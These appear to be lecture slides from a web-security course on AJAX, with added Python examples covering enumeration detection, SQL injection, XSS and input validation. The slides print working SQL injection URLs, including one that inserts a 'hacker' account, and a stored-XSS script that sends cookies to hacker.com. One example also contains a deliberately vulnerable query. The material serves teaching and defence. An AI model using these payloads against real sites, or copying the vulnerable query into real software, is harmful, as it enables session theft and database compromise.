CSE 136 - Lecture 8
AJAX Presentation Layer Security Lab
AJAX - what & why?
Asynchronous Javascript and XML
Why? To avoid postback -
saves page re-loading time
Transfer smaller amount of data across network
Example: select year, make, model
Improve performance
AJAX - flow
Ajax - postback vs callback
Ajax - ASP.NET Ajax Architecture
Basic functionality: string manipulation, components, networking, and web services
Provides object-oriented techniques with JavaScript code
Web Attack - Resource Enumeration
Common files: test.txt, back.zip, upload.zip, passwords.txt, users.txt, checkout.aspx.bak, checkout.asp.old
Common directories: /admin, /reports, /test, /upload, /temp, /include, /logs
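The slide lists the file and directory names that enumeration tools probe for. From the defender's side, the useful thing to build is the detection: a scanner walking that list leaves a burst of 404s for exactly these names from one client. The following is an added example, not part of the lecture, written in Python rather than the lecture's ASP.NET; the log lines are constructed in Common Log Format, and the IP addresses are documentation ranges.

```python
import re
from collections import defaultdict

# Watch-list taken directly from the slide.
COMMON_FILES = {"test.txt", "back.zip", "upload.zip", "passwords.txt", "users.txt",
                "checkout.aspx.bak", "checkout.asp.old"}
COMMON_DIRS = {"/admin", "/reports", "/test", "/upload", "/temp", "/include", "/logs"}

# Common Log Format: ip ident user [time] "METHOD path proto" status size
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log: one client walking the list, one normal visitor,
# and one client that touched a single watch-listed name (below threshold).
SAMPLE_LOG = """
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /passwords.txt HTTP/1.1" 404 153
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /back.zip HTTP/1.1" 404 153
203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /checkout.aspx.bak HTTP/1.1" 404 153
203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /logs/ HTTP/1.1" 404 153
198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /product.aspx?PID=1 HTTP/1.1" 200 2048
198.51.100.7 - - [10/Oct/2023:13:56:02 +0000] "GET /test.txt HTTP/1.1" 404 153
192.0.2.9 - - [10/Oct/2023:13:57:00 +0000] "GET /admin HTTP/1.1" 302 0
"""


def is_probe(path):
    """True if the request path is one of the slide's common files or directories."""
    base = path.split("?", 1)[0]           # ignore the query string
    name = base.rsplit("/", 1)[-1]         # file name component
    if name in COMMON_FILES:
        return True
    return any(base == d or base.startswith(d + "/") for d in COMMON_DIRS)


def enumeration_suspects(log_text, threshold=3):
    """Return {ip: sorted probed paths} for clients with >= threshold distinct
    watch-listed paths answered 404 (a real directory such as /admin answered
    200 or 302 is a normal visit, not a probe)."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue                        # blank or non-CLF line
        if m["status"] == "404" and is_probe(m["path"]):
            hits[m["ip"]].add(m["path"])
    return {ip: sorted(paths) for ip, paths in hits.items() if len(paths) >= threshold}


if __name__ == "__main__":
    for ip, paths in enumeration_suspects(SAMPLE_LOG).items():
        print(ip, "probed", paths)
```

The threshold keeps a single mistyped URL from raising an alert; in practice the same rule is applied per source address over a short time window, and the watch-list is extended with the site's own backup naming conventions.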
Web Attack - Parameter manipulation
/student/details/1000: change it to 1001?
SQL Injection
query = "select product_name from product where product_id=" + PID
PID comes from the web parameter:
http://myweb.com/product.aspx?PID=1
http://myweb.com/product.aspx?PID=1;union select name from sysobjects where xtype='U'
The hacker adds himself to the Users table:
http://myweb.com/product.aspx?PID=1; insert into Users (uname, pword) values ('hacker', 'hacked')
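The slide's query builds its SQL text by string concatenation, which is why the `union` payload is accepted as part of the statement. The following is an added example, not the lecture's ASP.NET code: it reproduces the vulnerable pattern against a constructed in-memory SQLite database (with `sqlite_master` standing in for SQL Server's `sysobjects`) and places the fix beside it, which is the "validate, then bind" rule from the prevention slide.

```python
import sqlite3


def build_db():
    """Constructed stand-in for the lecture's product and Users tables."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE product (product_id INTEGER PRIMARY KEY, product_name TEXT);
        CREATE TABLE users (uname TEXT, pword TEXT);
        INSERT INTO product VALUES (1, 'Widget'), (2, 'Gadget');
        INSERT INTO users VALUES ('alice', 'secret');
    """)
    return conn


def product_name_vulnerable(conn, pid):
    """The slide's pattern: the web parameter is pasted into the SQL text,
    so a PID of "1 union select name from sqlite_master where type='table'"
    lists the database's tables instead of one product. (The stacked
    ';insert' form on the slide is blocked by sqlite3.execute(), which only
    runs one statement, but the UNION form works as written.)"""
    query = "select product_name from product where product_id=" + pid
    return [row[0] for row in conn.execute(query)]


def is_valid_pid(pid):
    """Server-side validation: a product id is a non-negative integer, nothing else."""
    return isinstance(pid, str) and pid.isdigit()


def product_name_safe(conn, pid):
    """Validate first, then bind the value as a parameter. The SQL text is a
    constant; the driver passes PID as data, never as part of the statement."""
    if not is_valid_pid(pid):
        raise ValueError("PID must be an integer")
    query = "select product_name from product where product_id=?"
    return [row[0] for row in conn.execute(query, (int(pid),))]


if __name__ == "__main__":
    db = build_db()
    payload = "1 union select name from sqlite_master where type='table'"
    print("vulnerable:", product_name_vulnerable(db, payload))   # leaks table names
    print("safe:", product_name_safe(db, "1"))                     # ['Widget']
```

Parameter binding alone would already stop the injection (the bound string is compared as a value and matches no row); the integer check is kept because the lecture's prevention slide asks for server-side validation of every input, and it turns a silent empty result into an explicit rejection that can be logged.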
Web Attack – cross site scripting (XSS)
Once you compromise the database, insert JavaScript into the tables:
product.description = '<script>document.location='http://hacker.com/collector.html?cookie='+document.cookie</script>'
The hacker now knows your cookie when the content is rendered.
Danger of cross site scripting:
Contents of the current document cookie are sent off to hacker.com
Session IDs and authentication tokens are commonly stored in cookies
JavaScript can log key strokes
Web Attack - Prevention
Remove all SQL injection code
HTML-encode all data displayed to prevent XSS
Treat any input as a potential threat: a user can enter JavaScript in a textbox and textarea
Use validation on the server (the user could disable JavaScript error checking in the browser)
Encrypt cookies: user_id="100" // No. user_id="CQZJU-VQRQF-LAWFI-HGCPL-MTNTS-JYOPD-TIJYV-INMYJ-TVLLC-RWJOT-CTHAM-GJQHD"
Upload files (email attachments, business documents): servers should run a virus checker on all uploaded files
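Two of the prevention items above can be shown concretely: HTML-encoding at the point where database content is written into the page, and replacing a guessable cookie value such as `user_id="100"` with an opaque random token that is resolved server-side. This is an added example in Python, not the lecture's ASP.NET code; the stored description is a constructed copy of the slide's XSS payload, and `SessionStore` is a hypothetical in-memory stand-in for whatever session storage the web layer uses.

```python
import html
import secrets

# Constructed copy of the slide's stored-XSS payload, as it would sit in product.description.
STORED_DESCRIPTION = ("<script>document.location='http://hacker.com/collector.html?"
                      "cookie='+document.cookie</script>")


def render_description_unsafe(description):
    """Database content dropped straight into the page: the browser runs the script."""
    return "<div class='desc'>" + description + "</div>"


def render_description_safe(description):
    """HTML-encode on output: < > & ' " become entities, so the browser shows
    the text of the script tag instead of executing it."""
    return "<div class='desc'>" + html.escape(description, quote=True) + "</div>"


def contains_script_tag(rendered):
    """Check used below: does the rendered HTML still carry a live <script> tag?"""
    return "<script" in rendered.lower()


class SessionStore:
    """Hypothetical server-side session table. The cookie carries only an
    unguessable token; the mapping to the user id never leaves the server,
    so changing 100 to 101 in the cookie gains nothing."""

    def __init__(self):
        self._sessions = {}          # token -> user_id

    def issue(self, user_id):
        token = secrets.token_urlsafe(32)   # 256 bits from the OS CSPRNG
        self._sessions[token] = user_id
        return token

    def resolve(self, token):
        return self._sessions.get(token)    # None for unknown or forged tokens


if __name__ == "__main__":
    print(render_description_safe(STORED_DESCRIPTION))
    store = SessionStore()
    cookie = store.issue(100)
    print("Set-Cookie: session=" + cookie)
    print("resolves to user", store.resolve(cookie))
```

The slide calls the second item "encrypt cookies"; the property that matters is that the value is unguessable and not derivable from the user id, which an opaque random token gives directly. Encoding is done at output time rather than on the way into the database so that the same stored text is safe in every page that displays it.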
Web Attack and AJAX
The methods of a Web service are analogous to the form inputs of a Web application.
They are easy to find, easy to attack
WSDL is now open to public (example data often provided)
Web Attack - Traditional vs AJAX
Traditional:
These features are hidden from the user
AJAX & Web-services:
Each feature is now exposed to the public
Web Attack - white vs. black
Traditional black box: filtered data at the web server (only the last 4 digits of the cc number)
White box: unfiltered data from the business/service layer (shows the entire cc number); exposed BL domain model
Web Attack - Ajax security mistakes
Traditional vs. Ajax service:
The hacker bypasses the admin page and goes directly to the AJAX files to access the info
Ajax service exposed to everyone
Solution: use a cookie at the WEB web-service
Web Attack - Securing Ajax server
Install a validation filter
Use regular expressions to validate input strings
Use regular expressions to remove "attack" characters: < & \ / >, etc.
Validate the user through cookies/sessions (WEB web-services)
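The two slides above make one point: a web-service method is called directly, so it must do its own checks rather than rely on the admin page that normally calls it. The following added example (Python, not the lecture's ASP.NET; the session table and the year/make/model catalogue are constructed) implements that gate for the slide's year/make lookup: the service first requires a valid session cookie, then passes every parameter through a regular-expression validation filter, and only then touches data. The attack-character stripper from the slide is included as a separate function.

```python
import re

# Constructed session table (token -> user) as issued by the web layer at login.
SESSIONS = {"tok-constructed-3f9a7c": "alice"}

# Constructed catalogue for the slide's "select year, make, model" example.
MODELS = {("2011", "Honda"): ["Civic", "Accord"], ("2011", "Ford"): ["Focus"]}

# Validation filter: one allow-list pattern per expected parameter.
ALLOWED = {
    "year": re.compile(r"(19|20)\d{2}"),
    "make": re.compile(r"[A-Za-z][A-Za-z0-9 \-]{0,39}"),
}

# The slide's "attack" characters: < > & \ /
ATTACK_CHARS = re.compile(r"[<>&\\/]")


class RequestRejected(Exception):
    """Raised when a call fails the validation filter or has no valid session."""


def validation_filter(params):
    """Accept only known parameters whose whole value matches its pattern;
    anything unexpected (extra names, stray characters, SQL fragments) is rejected."""
    clean = {}
    for name, value in params.items():
        pattern = ALLOWED.get(name)
        if pattern is None or not pattern.fullmatch(value):
            raise RequestRejected(f"parameter {name!r} failed validation")
        clean[name] = value
    return clean


def strip_attack_chars(text):
    """The slide's second technique, for free text that cannot be allow-listed."""
    return ATTACK_CHARS.sub("", text)


def models_service(cookies, params, sessions=SESSIONS):
    """The AJAX web-service method. Step 1: validate the user via the session
    cookie, here at the service, not at the page that links to it. Step 2: run
    the validation filter. Step 3: serve the data."""
    user = sessions.get(cookies.get("session", ""))
    if user is None:
        raise RequestRejected("no valid session cookie")
    clean = validation_filter(params)
    return MODELS.get((clean["year"], clean["make"]), [])


def service_allows(cookies, params):
    """Convenience for checks below: True if the call would be served."""
    try:
        models_service(cookies, params)
        return True
    except RequestRejected:
        return False


if __name__ == "__main__":
    good = {"session": "tok-constructed-3f9a7c"}
    print(models_service(good, {"year": "2011", "make": "Honda"}))
    print("direct call without cookie served:", service_allows({}, {"year": "2011", "make": "Honda"}))
```

Of the two regular-expression techniques the slide names, the allow-list filter is the stronger one: it states what a valid value looks like and rejects everything else, and it needs no guess at which characters are dangerous. Stripping characters is lossy (the `&` in a company name disappears) and is best kept for free-text fields, with HTML-encoding still applied on output.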
Review question
Is Ajax synchronous or asynchronous?
Why use Ajax?
Is the Ajax architecture more or less secure?
What is XSS?
What is the difference between white box and black box?
Your assignment
Complete your MVC project with test cases
Project due next Thursday
Lab
Due: Grade your middle tier and test cases
References
.NET : Architecting Applications for the Enterprise
Ajax Security